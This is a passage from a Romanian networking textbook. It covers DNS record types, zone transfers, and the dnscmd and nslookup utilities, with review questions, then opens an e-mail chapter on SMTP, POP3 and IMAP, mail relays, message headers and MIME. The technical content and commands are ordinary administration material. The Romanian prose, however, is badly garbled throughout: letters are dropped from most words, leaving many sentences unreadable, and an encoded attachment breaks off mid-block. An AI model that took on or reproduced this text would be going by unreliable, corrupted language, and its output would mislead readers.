u a ezol ă ii. O astfel de i t a e a e aloa ea i pli ită de se u de o zi . Mi şo a ea
acestei valori poate pune mai bine în valoare load-balancing-ul implementat pe serverul DNS.
Totuşi, a est ge de load balancing are dezava tajele sale: u e fle i il, u ţi e o t de
apa ilităţile se e elo î t e a e dist i uie e e ile şi u poate fi otifi at desp e u se e
a e de i e i ope aţio al.
273 | D N S
7-12: Proprietățile u ei i trări de tip A (host)
 CNAME (canonical name): Pe ite at i ui ea ai ulto u e a eleiaşi staţii, e foloseşte o

si gu ă ad esă IP. P i CNAME, o staţie poate fi a esată p i t -o ad esă IP şi ai ulte alte
u e. U CNAME ep ezi tă, p a ti , u alias. O i t a e CNAME î fişie ul de o figu aţie a ată
î felul u ăto :
ftp CNAME data.storage.com
7-13: Proprietățile u ei i trări de tip CNAME
 MX (mail exchanger): Î egist ează ide titatea se e ului sau se e elor) de e-mail pentru o
a u ită zo ă sau do e iu. Ele di e ţio ează toate al ulatoa ele e do es să t i ită esaje
e- ail sp e u a u it do e iu sp e u a u it se e desti at p i i ii lo . Î fişie ele de
o figu a e, i t ă ile MX su t ide tifi ate p i t -u u ă de p efe i ţă. Nu e ele ai i i
ofe ă o p io itate ai a e. E e ple de i t ă i MX su t u ătoa ele:
@ MX 10 mail.storage.com
@ MX 100 queue.storage.com
Î azul î a e p i ul se e u ăspu de, a fi o ta tat el de-al doilea, pe t u ă u ărul

său de p efe i ţă este ai a e. E istă posi ilitatea de a defi i ai ulte i t ă i de tip MX u
a eeaşi aloa e u e i ă d ept p efe i ţă, eea e a e d ept efe t ealiza ea u ui load
balancing si plu, a şi î azul i t ă ii A.
 NS (nameserver): I t ă ile defi es se e ele de u e e ăspu d e e ilo pe t u u a u it
do e iu. De ase e ea, ele pot delega ezol ă ile u elo pe t u a u ite su do e ii u o
altor servere. O intrare NS într-u fişie de o figu a e a ată î odul u ăto :
@ NS ns1.storage.com
274 | ‘ e ţ e l e L o a l e
7-14: Proprietățile u ei i trări de tip MX
7-15: Proprietățile u ei i trări de tip N“
 SOA (start of authority): Cuprinde serverele de nume primare ce sunt autoritare pentru o
a u ită zo ă, p e u şi o i fo aţie de o ta t pe t u ad i ist ato ul espe ti ei zo e. De
ase e ea, sta ileşte pe ioada de ti p pe t u a e u se e eauto ita poate păst a
i fo aţiile p i ite î ai te de a le e ifi a di ou la serverul autoritar. Un exemplu de intrare
“OA este u ăto ul:
@ IN SOA ns.storage.com. admin.storage.com. (
200808272000; serial number – timestamp al ultimei modificări
100; refresh
50; retry
86400 ; expire
3600 ) ; default TTL – validitatea informaţiilor de la serverul autoritar
275 | D N S
7-16: Proprietățile u ei i trări de tip “OA
O i t a e “OA este auto at eată la i stala ea se e ului DN“, u alo i i pli ite pe t u
aşi a lo ală.
 PTR (pointer): ‘ealizează fu ţia opusă u ei i t ă i de tip A. U e e plu poate fi u ăto ul:
61.130.98.66.in-addr.arpa. IN PTR site3.storage.com
Pe t u a defi i o i t a e de tip PT‘ a ual sau auto at, la ea ea u ei i t ă i de tip A este

e esa ă ea ea u ei zo e de tip reverse lookup zo ă de ezol a e i e să . C ea ea u ei
astfel de zone se face similar cu a uneia de tip forward lookup, u dife eţa ă a e ista şi
opţiu ea de a ea o zo ă de ezol a e i e să pe t u ad ese IP sau IP .
7-17: Proprietățile u ei i trări de tip PTR
 SRV (service): I di ă tipul şi a ope i ea u o se i ii pe t u o a u ită zo ă şi su t de a e

i po ta ţă pe t u fu ţio a ea Active Directory. Ca şi i t ă ile de tip MX, i t ă ile “‘V deţi u
numă de p efe i ţă, de i e istă şi posi ilitatea de a ealiza o fo ă de load balancing. Un
exemplu de intrare de tip SRV, într-u fişie de o figu a e, poate fi u ăto ul:
_kerberos._tcp._sites.dc._msdcs 600 SRV 100 88 global.storage.com.
276 | ‘ e ţ e l e L o a l e
Pe scurt, câmpurile au u ătoa ele se ifi aţii:

o _kerberos ep ezi tă se i iul desp e a e se ofe ă i fo aţii;
o _tcp i di ă i di ă faptul ă a esta utilizează TCP pe t u fu ţio a e, de i poate i di a şi UDP;
o global.storage.com ep ezi tă u ele se e ului e ofe ă a est serviciu;
o 600 i di ă pe ioada de aliditate TTL a î egist ă ii, î se u de;
o 88 este po tul pe a e fu ţio ează se i iul;
o 100 este u u ă e i di ă p efe i ţa a estei i t ă i, a şi î azul MX-urilor.
I t ă ile de tip “‘V su t i po ta te pe t u Active Directory deoa e e i di ă e staţii di
do e iu ulează se i ii Active Directory. Serviciile pe care Active Directory le aută î i t ă ile
de tip “‘V su t u ătoa ele i t a ea “‘V, î ge e al, supo tă ai ulte :
o _kerberos: autentificare folosind servere Kerberos Key Distribution Center (KDC);
o _kpasswd: e a is de s hi a e se u izată a pa olei Kerberos;
o _ldap: Lightweight Directory Access Protocol, o modalitate prin care programele externe pot
o u i a şi s hi a date u Active Directory;
o _gc: Global Catalog, o ţi e u su set al at i utelo o ie telo di t -o i f ast u tu ă Active
Directory.
Pe t u i t ă ile de ai sus, î azul î a e se do eşte i te ope a ilitatea u se e e DN“ di
mediul UNIX (precum BIND), nu se pot folosi caracterele – sau _.
7-18: Proprietățile u ei i trări de tip “RV
7.4.1.4 Crearea unui server de nume secundar

Pe t u fu ţio a ea u ui se e de u e se u da , este e esa a a esta să uleze
Windows Server 2008 cu serviciul DNS instalat şi t e uie să fie o figu at pe t u a se folosi pe
el î suşi d ept se e DN“:
1. Di i te faţa de ad i ist a e a se i iului DN“, su atego ia Forward lookup zones, se alege
New Zone din meniul contextual;
2. Se alege Secondary pe t u a ea o zo ă de ezol a e se u da ă. A easta a i di a şi faptul ă
serverul local este unul secundar;
3. Se introduce numele zonei secundare;
4. “e i t odu pe â d u ele sau ad esele se e elo p i ipale de pe a e o fi des ă ate
i fo aţiile zo ei.
Da ă se do eşte o ertirea unui server secundar în unul principal, se poate realiza

a easta sele tâ d zo a defi ită a se u da ă şi a esâ d opţiu ea Properties din meniul
contextual. La categoria General, în dreptul lui Type, se apasă uto ul Change (figura 7-19),
după a e se poate alege oul tip de zo ă: Primary, Secondary sau Stub.
277 | D N S
7-19: Convertirea unei zone secundare
7.4.1.5 Transferuri de zone

Di o e t e utilizato ii o iş uiţi di I te et u t e uie să ai ă d eptul de a o ţi e
copii ale zonelor de pe orice server DNS deoarece aceasta ar putea expune întreaga
i f ast u tu ă a se e elo u ei eţele, de i u is a e de se u itate, se poate o t ola
modul în care se pot realiza transfe u ile de zo e. I te faţa pe t u a easta se a esează p i
e iul de p op ietăţi al u ei zo e, su Zone transfers (figura 7-20):
7-20: Configurarea transferurilor de zone
După u se o se ă, t a sfe u ile de zo e pot fi deza ti ate î totalitate. Totuşi, da ă se

alege a ti a ea lo , se pot i pu e li ită i astfel î ât a estea să u poată fi ealizate de ât u
serverele listate la Name servers (deci serverele de nume aflate sub control propriu, cel mai
278 | ‘ e ţ e l e L o a l e
adesea sau doa u o se ie de se e e ale ă o ad ese pot fi i t oduse î lista de ai sus fig
7-20).
Tot de ai i poate fi o figu ată şi opţiu e de otifi a e a alto se e e î u a s hi ă ilo
efectuate într-o zo ă. Pot fi o ta tate doa se e ele di lista Name Servers sau efectiv cele
introduse manual în lista din fereastra Notify (figura 7-21):
7-21: Notificarea altor servere
7.5 Configurări în linie de comandă

7.5.1 Fişierul (osts
Ca şi î azul siste elo Li u , şi Wi do s deţi e u fişie p i a e su t t aduse lo al
o espo de ţele di t e u e şi ad ese IP. A est fişie este lo alizat în
%systemroot%\System32\drivers\etc\Hosts adi ă, sp e e e plu, î
C:\Windows\System32\drivers\etc\Hosts).
I fo aţiile di fişie ul Hosts afe tează ezol a ea u elo asup a î t egului siste , u
doa pe t u o o e iu e, şi i i doa pe t u IP .
Înregist ă ile di fişie ul Hosts sunt trecute sub forma <adresă> <nume> iar comentarea
liniilor se face prin caracterul #.
7.5.2 Ipconfig
Câte a di t e fu ţiile utilita ului ipconfig, folosit î p i ipal pe t u TCP/IP ad esează şi
o figu aţia DN“ a siste ului local:
ipconfig /displaydns
Co a da de ai sus afişează î egist ă ile î cache-ul local DNS (practic, numele deja
ezol ate şi a e u au e pi at î ă şi este utilă pe t u depista ea e o ilo de ezol a e pe t u
a u ite u e. Î fu ţie de siste ul de ope a e, fie a e u e a ă ui ezol a e a fost
efe tuată u su es este eţi ut o pe ioadă de ăt e siste ul de ope a e pe t u a u ai
e esita o ouă o ta ta e a se e ului DN“ pe t u o e e tuală ouă e e e.
ipconfig /flushdns
Folosind ipconfig î p eu ă u parametrul /flushdns se poate fo ţa şte ge ea i t ă ilo

din cache-ul lo al. Toate ezol ă ile ulte ioa e o o ta ta p i a oa ă se e ul DN“,
construind astfel din nou cache-ul.
ipconfig /registerdns
Parametrul /registerdns fo ţează lie tul să se eî egistreze în mod dinamic la serverul

DN“, da ă zo a espe ti ă supo tă a tualiză i di a i e a se edea şi se ţiu ea 7.4.1.1 -
Co figu a ea i iţială şi ea ea u ei zo e).
279 | D N S
7.5.3 Dnscmd
Utilitarul dnscmd ep ezi tă a ia ta î li ie de o a dă a i te feţei de ad i ist a e a
serverului DNS din Windows Server 2008. El pe ite ad i ist ato ilo să eeze zo e, să
odifi e î egist ă i şi să efe tueze o se ie de a ţiu i ad i ist ative asupra serverului DNS.
Pe t u a e u e a pa a et ii o e zii şi efe tele lo , se poate i t odu e o a da1:
dnscmd /?
U e e plu de utiliza e este u ătoa ea o a dă:

dnscmd s6.corp.marketing.local /ZoneAdd corp.marketing.local /Primary /file
corp.marketing.local.dns
Co a da de ai sus a e a efe t ea ea u ei oi zo e p i a e sta da d, u ită

corp.marketing.local pe un server cu numele s6.corp.marketing.local, a ă ei
o figu aţie a fi sto ată î fişie ul corp.marketing.local.dns. În mod intuitiv, pentru
ea ea u ei zo e se u da e se î lo uieşte pa a et ul /Primary cu /Secondary.
U e e plu de adăuga e a u ei oi î egist ă i RR la o zo ă e iste tă este u ătoa ea
o a dă:
dnscmd s6.corp.marketing.local /RecordAdd corp.marketing.local www A 192.168.1.23
Pi o a da a te ioa ă se adaugă o ouă î egist a e de tip A host u ită www, la zona

corp.marketing.local, e fa e legătu a u ad esa IP . . . . “e e ul pe a e se
efe tuează odifi a ea este a elaşi a şi î e e plul a te io , s6.corp.marketing.local.
Vizualizarea tuturor zonelor dintr-un server se poate face prin comanda2:
C:\Users\Administrator>dnscmd ::1 /enumzones
Enumerated zone list:
Zone count = 3
Zone name Type Storage Properties
. Cache File
15.86.117.in-addr.arpa Primary File Update Rev
storage.com Primary File Update
Command completed successfully.
Şte ge ea cache-ului de pe un anumit server folosind dnscmd se poate face utilizând

comanda:
dnscmd s6.marketing.local /clearcache
Pe t u o op i e şi o epo i e apidă a u ui a u it se e :
dnscmd s6.marketing.local /restart
E po ta ea o figu aţiei u ei zo e DN“ î t -u fişie se fa e u pa a et ul /zoneexport,

u at de u ele zo ei şi apoi de u ele fişie ului î a e a easta a fi e po tată:
dnscmd /zoneexport corp.marketing.local corp.marketing.local.dns
Şte ge ea u ei zo e de pe u a u it se e se ealizează u u ătoa ea o a dă, u de

primul pa a et u ep ezi tă u ele se e ului pe a e se efe tuează odifi a ea, ia u ele
de după /zonedelete ep ezi tă u ele zo ei de şte s:
dnscmd s6.corp.marketing.local /zonedelete corp.marketing.local
1
O listă ai up i zătoa e a pa a et ilo supo taţi de d s d poate fi a esată la ad esa:
http://www.minasi.com/newsletters/nws0803a.htm
2
:: este otaţia ad esei IP pe t u lo alhost, e hi ale tul lui . . . î IP .
280 | ‘ e ţ e l e L o a l e
7.5.4 Nslookup
Utilitarul nslookup este printre cele mai utile şi uşo de utilizat etode de testa e a
fu ţio alităţii u ui se e DN“. Fu ţia lui de ază este, p a ti , ea de ezol a e a u ei e e i
folosind serverul DNS declarat implicit în Windows.
Pentru o simpla interogare de tip A (host) se introduce comanda nslookup u ată de
numele de rezolvat:
C:\Users\Administrator>nslookup cs.pub.ro
Server: dns-cache-3.rcs-rds.ro
Address: 82.76.253.115
Non-authoritative answer:
Name: cs.pub.ro
Address: 141.85.37.5
nslookup supo tă şi alte tipu i de i te ogă i, precum MX sau SOA. Pentru a emite astfel de
i te ogă i, se i t odu e o a da nslookup fă ă pa a et i, se spe ifi ă tipul de i te oga e
dorit prin comanda set query si apoi se introduce numele de rezolvat, ca în exemplul
u ăto pe t u a ieşi di prompt-ul nslookup se pot da comenzile exit, quit sau CTRL-C):
C:\Users\Administrator>nslookup
Default Server: dns-cache-3.rcs-rds.ro
Address: 82.76.253.115
> set query=mx
> cs.pub.ro
Address: 82.76.253.115
cs.pub.ro MX preference = 5, mail exchanger = mail.cs.pub.ro
> set query=soa
> cs.pub.ro
Address: 82.76.253.115
cs.pub.ro
primary name server = ns.cs.pub.ro
responsible mail addr = admin.cs.pub.ro
serial = 2008041301
refresh = 28800 (8 hours)
retry = 7200 (2 hours)
expire = 604800 (7 days)
default TTL = 86400 (1 day)
281 | D N S
Î tre ări
1. Ca e di afi aţiile de ai jos su t ade ă ate? alegeţi toate a ia tele a e se
potrivesc)
 DN“ este o ază de date dist i uită
 DN“ este o ază de date e t alizată
 administrarea bazei de date DNS se face centralizat
 administrarea bazei de date DNS se face distribuit
2. www.kde.org poate fi numele de do e iu pe t u: alegeţi toate a ia tele a e se

potrivesc)
 O intrare de tip NS
 O intrare de tip A
 O intrare de tip PTR
 O intrare de tip MX
3. ‘ăspu su i auto ita e pot fi date de alegeţi toate a ia tele a e se pot i es :

 Serverele de nume master
 Serverele de nume de tip forwarding
 Serverele de nume slave
 Serverele de nume tip caching-only
4. Ca e su t doi fa to i i po ta ţi pe t u alege ea ti pului de iaţă a u ei i t ă i di

aza de date DN“? alegeţi două a ia te
 Ti pul de ăspu s
 Lungimea numelui
 Nu ă ul de sepa ato i . di u e
 A u ateţea ăspu sului
5. U lie t DN“ t i ite se e ului DN“ e e i ... ... ... ... şi p i eşte ăspu su i ... ... ...
... alegeţi toate a ia tele a e se pot i es
 nerecursive, autoritare
 nerecursive, neautoritare
 recursive, autoritare
 recursive, neautoritare
6. I t a ea e ide tifi ă se e ul de u e aso iat u u do e iu este de tip:

 A
 PTR
 MX
 NS
7. Care este utilitatea seriei bazei de date a unui domeniu (serial)?

 Este folosită de se e ul aste pe t u a e ifi a o siste ţa u oot se e ele
 Este folosită de se e ul sla e pe t u a şti ce s-a schimbat la serverul master
 Este folosită de se e ele de u e pe t u a ide tifi a i t ă ile di a he
 Este folosită de BIND pe t u a ide tifi a s hi ă ile efe tuate asup a fişie ului p i ipal
de o figu aţie
282 | ‘ e ţ e l e L o a l e
8. Care este utilitatea câmpului TTL dintr-o înregistrare SOA?

 Î egist ă ile de tip “OA u o ţi â pu i TTL
 “pe ifi ă du ata de iaţă pe t u ăspu su ile poziti e di a he
 “pe ifi ă du ata de iaţă pe t u ăspu su ile egati e di a he
 “pe ifi ă du ata de iaţă pe t u ăspu su ile egati e si poziti e di a he
9. Ca e poate fi auza e ezol ă ii e e ilo DN“ da ă u lie t a e o figu at u

se e de u e î fişie ul /et / esol . o f, ia se e ul fu ţio ează?
 Fişie ul /et /hosts u o ţi e u ele i te ogat
 Fişie ul /et / ss it h. o f u o ţi e u â tul heie DN“ î li ia e des ie odalitatea
de ezol a e a u elo staţiilo
 Nu a fost pornit serviciul de rezolvare
 Serviciul de rezolvare este pornit, dar portul este filtrat cu ajutorul unui firewall
10. Ca e este di e ti a BIND p i a e se pot spe ifi a lie ţii a e pot fa e e e i

ăt e se e ?
 allow-answer
 allow-query
 forwarders
 forwarding-servers
283 | E - m a i l
8 E-mail
Dia o ds a e fo e e . E-mail o es lose.
June Kronholz

 Fu ţio a ea se i iului de e-mail
 Protocoale folosite: SMTP, IMAP, POP3
 Configurarea Postfix
 Configurare Courier-IMAP
 Configurarea Procmail
Cine este...
Eric Paul Allman este creatorul programului se d ail și al p e u so ului a estuia
u it deli e ail. “e d ail a de e it o pa te i po ta tă a dist i uţiei de soft a e de la
Be kle B“D și este î o ti ua e el ai utilizat MTA î siste ele U i . Î a fo tat
Sendmail Inc. pentru a lucra la î u ătăţi ea se d ail.
Wietse Venema este u p og a ato și fizi ia ola dez, eato ul și p i ipalul
dezvoltator al server-ului de e- ail Postfi . De ase e ea, a s is ai ulte apli aţii î
do e iul se u ităţii siste elo . Di , lu eaza î “tatele Unite la IBM Thomas J.
Watson Research Center unde continua sa dezvolte Postfix. A primit numeroase premii
pe t u a ti ităţile sale.
Ray Tomlinson este persoana care a implementat primul sistem de e-mail într-o eţea,
ai p e is î eţeaua ARPANet. “iste ul putea sa t i ită e-mail-u i pe t u utilizato i legaţi
la computere din ARPANet folosind semnul @ pentru a separa numele utilizatorului de
numele host-ului. A ajutat la i ple e ta ea p oto olului Tel et și a odifi at p og a ul
SNDMSG pentru a permite t i ite ea esajelo și la utilizato i pe alte o pute e su
forma de e-mail-u i. A p i it u e oase p e ii pe t u a ti ităţile sale.
Electronic mail poştă/ esage ie ele t o i ă , a e iat e-mail sau e-mail, este o etodă
de compunere, transmitere, recepţie şi a esa e a esajelo peste siste e de o u i aţie
ele t o i ă. Te e ul se apli ă atât siste elo de e-mail din Internet bazate pe SMTP (Simple
Mail Transfer Protocol ât şi siste elo de g upu i de ola o a e a e pe it utilizato ilo
unei companii sau o ga izaţii să t a s ită esaje alteia. Î a est apitol su t p eze tate
detalii legate de fu ţio a ea şi a hite tu a siste ului de e- ail şi p oto oalele şi apli aţiile
utilizate.
Ideea de esage ie ele t o i ă datează di a ul , â d ‘a To linson dezvolta prima
apli aţie de e-mail pentru ARPANET. Utilizat preponderent la începutul Internetului, serviciul
de e-mail a pie dut te e î faţa alto p oto oale p e u FTP, HTTP, Bitto e t. Cu toate
a estea, e ti de ea I te etului şi apa iţia u o forme diverse de platforme de colaborare
asigu ă folosi ea la s a ă la gă a se i iului. Da ă la î eput o u i aţia p i e-mail se realiza
î ea ai a e pa te î t e două pe soa e, o u ă pa te di esajele t i ise î I te et su t
mesaje pentru liste de dis uţii, fo u u i, siste e de ticketing sau bug-tracking sau pentru alte
forme de colaborare.
P o a il ă ea ai i po ta tă p o le ă a se i iului de e-mail sunt mesajele nesolicitate
(e-mail spam . “e ap e iază ă esajele esoli itate ep ezi tă peste 80% din totalul de
mesaje din lume. Diferite tehnici anti-spam precum integrarea lor în serverele de transfer,
DNS blacklisting, greylisting sunt folosite pentru a bloca mesajele nesolicitate.
284 | ‘ e ţ e l e L o a l e
8.1 Arhitectură şi funcţionare. Protocoale

Deşi se i iul de e-mail a e o fu ţio a e lasi ă de tipul lie t-server peste TCP, un mesaj
pa u ge ai ulte o po e te di o e tul o pu e ii pâ ă î o e tul iti ii.
Co po e tele pa u se de esaj di o e tul li ă ii a estuia pâ ă la sto a ea a estuia su t
de u ite şi age ţi.
 MTA (Mail Transfer Agent, server SMTP) (denumit mail server sau mail exchange server în
context DNS) - este u p og a sau age t soft a e a e asigu ă t a sfe ul esajelo de la u
al ulato la altul de la su să la desti aţie ;
 MUA (Mail User Agent) (denumit e-mail client) - este programul folosit pentru citirea,
o pu e ea şi t a s ite ea de esaje de poştă ele t o i ă; iti ea de esaje se fa e folosi d
POP3 sau IMAP, iar transmiterea se face folosind SMTP (prezentate mai jos);
 MDA (Mail Delivery Agent, sau LDA - Local Delivery Agent) - este p og a a e a eptă
mesajele e-mail şi le dist i uie ăt e ăsuţa poştală a desti ata ului;
 ăsuță poştală (message storage) – este o i t a e î siste ul lo al de fişie e utilizată pe t u
stocarea mesajelo de poştă ele t o i ă; ăsuţa poştală este i te ogată de MUA pe t u
p elua ea esajelo de poştă ele t o i ă si de MTA e e tual MDA pe t u sto a ea de oi
mesaje;
 server POP3/IMAP – se e folosit pe t u opie ea sau a esa ea esajelo sto ate î ăsuţa
poştală; lie tul MUA foloseşte POP sau IMAP î ad ul o u i aţiei u se e ul.
“e i iul de poştă ele t o i ă fu ţio ează pe aza a t ei p oto oale i po ta te, a e
asigu ă o u i aţia î t e o po e tele de ai sus. Toate t ei p oto oalele fu ţio ează
peste TCP.
 SMTP (Simple Mail Transfer Protocol) - protocol utilizat de mail servere (MTA); SMTP este
standardul de facto pentru transmiterea mesajelor electronice în Internet; portul implicit
utilizat este 25; MTA-ul as ultă pe po tul spe ifi at e e i de t a s ite e de esaje de poştă
ele t o i ă î fo at “MTP; “MTP este folosit î ad ul u ei sesiu i de o u i aţie î t e MUA
şi MTA sau î t e două MTA-uri;
 POP3 (Post Office Protocol version 3) - protocol utilizat de clientul de e-mail (MUA) pentru a
des ă a esajele de poştă ele t o i ă de pe u se e ; po tul i pli it utilizat este ;
 IMAP (Internet Message Access Protocol) - protocol folosit de MUA pentru accesarea mesajelor
electronice pe un server; portul implicit utilizat este 143.
Pe un siste a e ulează u dae o /se i iu POP sau IMAP, u lie t de e-mail se va
o e ta la po tul spe ifi şi, folosi d p oto olul î auză, a i te oga ăsuţa poştală a
utilizatorului specificat pentru citirea mesajelor.
Fo atul u ei ad ese de poştă ele t o i ă este fo at di t ei a pu i:
 u ele utilizato ului a e do eşte t a s ite ea sau e epţia esajului;
 si olul „@ itit at sau a-rond);
 u ele do e iului DN“ a e pe t u a e se t a s ite/ e epţio ează esajul.
8.1.1 Funcţionarea serviciului de e-mail

Pe t u a e e plifi a odul î a e o po e tele p eze te ai sus i te a ţio ează, se
p esupu e u ătoa ea situaţie: A a a e ad esa de ail ana@avatar.org şi do eşte să-i
t a s ită u esaj lui Bogda , a e a e ad esa de ail bogdan@berserk.org. MTA-ul
domeniului avatar.org este smtp.avatar.org, iar cel al domeniului berserk.org este
smtp.berserk.org. Paşii u aţi su t u ăto ii:
1. A a o pu e u esaj folosi d u MUA; după e o a dă t a s ite ea esajului, MUA-ul
t a sfo ă esajul î t -un format specific1, se o e tează la MTA-ul local (sau cel configurat
1
RFC 822
285 | E - m a i l
în MUA), în cazul de faţă, smtp.avatar.org, şi foloseşte “MTP pe t u a t a s ite esajul ăt e

acesta;
2. MTA-ul a alizează ad esa desti aţie fu izată p i “MTP bogdan@berserk.org ; foloseşte DN“
pentru a afla mail exchange serverul responsabil pentru domeniul berserk.org;
3. serverul de nume pentru berserk.org ăspu de u o î egist a e de tipul MX o ţi â d MTA-ul
responsabil: smtp.berserk.org; mesajul este transmis între MTA-uri (de la smtp.avatar.org la
smtp.berserk.org) folosind SMTP;
4. opţio al la desti aţie, LDA ealizează dist i uţia esajelo î ăsuţa poştală a lui Bogda ;
LDA-ul este responsabil cu filtrarea mesajelor;
5. Bogda foloseşte MUA-ul propriu pentru a citi mesajul; acesta se poate conecta pe sistemul
u de se găseşte ăsuţa de poştă ele t o i ă folosi d IMAP sau poate idi a esajele de pe
server pentru a le consulta offline (folosind POP3).
Paşii de ai sus su t p eze taţi î figu a u ătoa e:
To:bogdan@berserk.org To:bogdan@berserk.org
From: ana@avatar.org From: ana@avatar.org
MUA Ana SMTP Bogdan

POP3/IMAP browse
r
SMTP
smtp.berserk.org
smtp.avatar.org
mx.berserk.org
MX berserk.org?
ns.berserk.org
8-1: Fu țio area ser i iului de e-mail
8.1.1.1 Open mail relays

I iţial, MTA-u ile a eptau esaje ăt e o i e desti ata di I te et şi î e au
t a s ite ea a esto a ăt e desti aţie. Astfel de MTA-uri sunt denumite open mail relays.
A est lu u e a i po ta t la î eputul I te etului â d o e iu ile e au esigu e. Da ă u
MTA u putea aju ge la desti aţie, el putea t a s ite relay esajul ăt e u se e relay
a e e a ai ap opiat de desti aţie. Serverul relay a fi a ut o şa să ult ai u ă de
t a s ite e a esajului la u o e t ulte io . Totuşi, a est e a is s-a dovedit a fi
e ploata il de ăt e ei a e t a s iteau esaje ele t o i e esoli itate spam). Drept
o se i ţă, foa te puţi e MTA-u i ode e au fu ţio alitate de open mail relay şi ea ai
mare parte nu vor accepta mesaje de la MTA-uri de tip open mail relay pe t u ă este foa te
p o a il a a este esaje să fie spam.
ISP-u ile p a ti ă două etode pe t u a p e e i a se e ele lo sa de i ă open relay:
accepta ea o e iu ilo doa de la lie ţii săi u spammer, care nu este client al ISP-ului nu va
putea folosi a el se e şi ea ea u o liste de desti ata i a eptaţi allowed recipients) astfel
încât un spammer nu va putea folosi acel server pentru a trimite ail at e o i e desti aţie.
286 | ‘ e ţ e l e L o a l e
8.1.2 Formatul mesajelor

Un mesaj electronic este format1 dintr-un plic (envelope şi o ţi ut. „Pli ul o ţi e
i fo aţii u p i i e la li a ea esajului ăt e desti aţie, î ti p e o ţi utul esajului este
obiectul efectiv transferat. Plicul este descris, de obicei, prin comenzi SMTP:
MAIL FROM:<userx@y.foo.org>
RCPT TO:<@hosta.int,@jkl.org:userc@d.bar.org>
Co ți utul u ui esaj up i de două pă ţi: antetul şi corpul mesajului. Antetul, la rândul

său, ep ezi tă o si ta ă st i tă, î e e e o pul ep ezi tă o pa te opţio ală î o ţi utul
mesajului. Corpul este format dintr-o succesiu e de li ii de te t fă ă i iun fel de constrângeri.
O linie din antet este o pusă di t -u u e de â p u at de ':' şi apoi des ie ea
câmpului. “p e e e plu, ''“u je t: Mesaj de test'', foloseşte â pul ''“u je t'', u des ie ea
''Mesaj de test''. Des ie ile de â p pot a ea u fo at spe ial, da pot fi şi est u tu ate.
Câmpurile importante din cadrul unui mesaj pot fi observate în extrasul de mesaj de mai
jos:
Return-Path: <tavi@cs.pub.ro>
X-Original-To: razvand@cs.pub.ro
Delivered-To: razvand@cs.pub.ro
Received: from ixro-ex1.ixiacom.com (unknown [212.146.94.66])
by mail.cs.pub.ro (Postfix) with ESMTP id 7588E156B2C;
Wed, 25 Jun 2008 14:12:46 +0300 (EEST)
Received: from [10.205.9.116] ([10.205.9.116]) by ixro-ex1.ixiacom.com with Microsoft
SMTPSVC(6.0.3790.1830);
Wed, 25 Jun 2008 14:14:39 +0300
From: Octavian Purdila <tavi@cs.pub.ro>
Organization: Politehnica University of Bucharest
To: Razvan Deaconescu <razvand@cs.pub.ro>
Subject: Re: doctorat tavi
Date: Wed, 25 Jun 2008 14:11:41 +0300
User-Agent: KMail/1.9.9
Cc: Razvan Rughinis <rrazvan@cs.pub.ro>
References: <200806131346.46727.tavi@cs.pub.ro>
In-Reply-To: <200806131346.46727.tavi@cs.pub.ro>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200806251411.41675.tavi@cs.pub.ro>
X-OriginalArrivalTime: 25 Jun 2008 11:14:39.0621 (UTC) FILETIME=[A8E6BB50:01C8D6B4]
X-mail.cs.pub.ro-MailScanner: Found to be clean
X-mail.cs.pub.ro-MailScanner-SpamCheck: not spam, SpamAssassin (score=0.847,
required 6, autolearn=not spam, BAYES_00 0.71,
FORGED_RCVD_HELO 0.14)
X-mail.cs.pub.ro-MailScanner-From: tavi@cs.pub.ro
Câmpurile Return-Path, X-Original-To, Delivered-To, Received ofe ă i fo aţii

efe itoa e la alea pa u să de esaj pâ ă la desti aţie. Câ pu ile a e î ep u „X su t
â pu i spe iale de e te sie adăugate de utilita e specializate. În exemplul de mai sus acest
utilitare sunt MailScanner şi SpamAssassin.
Alte câmpuri prezente în mesaj sunt:
1. Câmpuri referitoare la data mesajului:
o Date: data t a s ite ii esajului data lo ală â d esajul a fost t i is sp e li a e de ăt e auto .
2. Câmpuri referitoare la autor:
o From: â pul spe ifi ă u a sau ai ulte ad ese ale auto ului/auto ilo esajului î t -un format
standardizat;
o Reply-To: pe ite spe ifi a ea ăsuţei poştale u de auto ul suge ează t i ite ea ăspu sului;
o User-agent: clientul de e-mail (MUA) folosit pentru trimiterea mesajului;
3. Câmpuri referitoare la destinatar:
o To: o ţi e lista ad eselo desti ata ilo esajelo ;
o Cc (Carbon Copy): o ţi e lista ad eselo pe soa elo a o a le a fi li at esajul, fă ă a a esta să
le fie adresat în mod direct;
1
RFC 2822
287 | E - m a i l
o Bcc (Blind Carbon Copy): o ţi e lista ad eselo pe soa elo ă o a le a fi li at esajul, fă ă a

a este ad ese să fie izi ile elo lalţi desti ata i.
4. Câmpuri de identificare a mesajului:
o Message-ID: un identificator unic al mesajului;
o In-Reply-To: a est â p este p eze t î esajele de ăspu s la alte esaje şi o ţi e Message-ID-ul
esajului la a e se ăspu de;
o References: â p p eze t î esajele de ăspu s, o ţi â d ide tifi ato ii alto esaje la a e
mesajul curent face referire.
5. Câ pu i efe itoa e la o ţi ut:
o Subject: subiectul mesajului;
8.1.2.1 MIME
Dat fii d faptul ă î o e tul ela o ă ii a esto spe ifi aţii u se pu ea p o le a de a
transmite altceva decât text, nu s-a defi it e a t fo a o ţi utului unui mesaj. Nevoia de a
t a s ite alt e a de ât te t î ad ul u ui esaj audio/ ideo a dus la apa iţia u o
p o le e. “oluţia a fost MIME (Multipurpose Internet Mail Extension)1. Dato ită la gii
ăspâ di i a siste ului defi it de ‘FC , MIME u putea să fie gâ dit de ât a o adăugi e la
a este spe ifi aţii, i ide u a o î lo ui e.
Utilitarul uuencode poate fi folosit pe t u odifi a ea fişie elo i a e î fo at a e poate
fi transmis prin e-mail:
razvan@valhalla:/tmp$ uuencode Test_vm_lin.zip hello.zip
begin 644 hello.zip
M4$L#!!0````(`&:HDS6\![A=F````,D````0`!4`36%K969I;&4N8VAE8VME
M<E54"0`#<#>(169FB$55>`0`Z`/H`W-V\W%T#U:P5=`-3\S)4=!-Y^+2"_#P
M]XNT4BA)+2[AX@**0IF<J14%^44E"CXN\3Z>3D&.09'Q`8XA'K9Z"FIJ"GKZ
M$.5)I9DY*;H%1:E67)Q<7"`QB&Z]?"Y.%0UG9TVX10H*"KKY8#D%E3@%71\]
[...]
8.1.3 SMTP (Simple Mail Transfer Protocol)

SMTP2 este protocolul utilizat de serverele de e-mail (MTA) pentru transportul mesajelor.
